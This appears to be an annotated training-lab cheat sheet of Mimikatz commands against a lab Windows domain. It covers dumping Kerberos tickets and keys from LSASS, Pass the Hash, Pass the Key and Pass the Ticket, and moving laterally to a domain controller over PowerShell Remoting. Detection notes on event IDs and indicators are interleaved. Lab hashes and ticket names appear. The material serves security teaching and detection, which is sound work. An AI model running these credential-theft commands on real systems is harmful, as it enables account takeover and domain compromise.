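# Pass the Hash: sekurlsa::pth starts cmd.exe using julio's NTLM (RC4) hash in place of the password.
# Detection: the new process appears as a 4624 logon of type 9 (NewCredentials); LSA protection (RunAsPPL) is designed to block the LSASS access this relies on.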
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
Note: To collect the tickets of every logon session on the host, Mimikatz or Rubeus must be run as an administrator.
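# Export (dump) all Kerberos tickets held in LSASS memory to disk.
# The result is a set of .kirbi files in the current directory, one per ticket.
# Defender note: unexpected .kirbi files on a host are a strong indicator of ticket theft.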
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
exit
dir *.kirbi
# Extract the Kerberos encryption keys (AES256, AES128, RC4/NTLM) of logged-on sessions from LSASS
mimikatz.exe
privilege::debug
sekurlsa::ekeys
Note: Mimikatz requires administrative rights to perform the Pass the Key/OverPass the Hash attacks because it has to write to LSASS, while Rubeus doesn't.
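# Pass the Key / OverPass the Hash: start a process whose Kerberos tickets are requested with the user's key (here the NTLM hash).
# Detection: a TGT request using RC4 (encryption type 0x17 in event 4768) in a domain that normally uses AES stands out on the domain controller.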
mimikatz.exe
privilege::debug
sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f
# Pass the Ticket: load a previously exported .kirbi ticket into the current logon session
mimikatz.exe
privilege::debug
kerberos::ptt "C:\Users\plaintext\Desktop\Mimikatz\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"
exit
# The injected ticket is now used for authentication, e.g. when listing the DC's C$ share
dir \\DC01.inlanefreight.htb\c$
# Pass the Ticket for lateral movement: load john's ticket, then use it for PowerShell Remoting
mimikatz.exe
privilege::debug
kerberos::ptt "C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
exit
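# Then open a PowerShell Remoting session to DC01 using the injected ticket;
# whoami and hostname confirm which identity and host the session runs as.
# Defender note: on DC01 this shows up as a network logon (event 4624, type 3) with a wsmprovhost.exe process for the WinRM session.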
powershell
Enter-PSSession -ComputerName DC01
whoami
hostname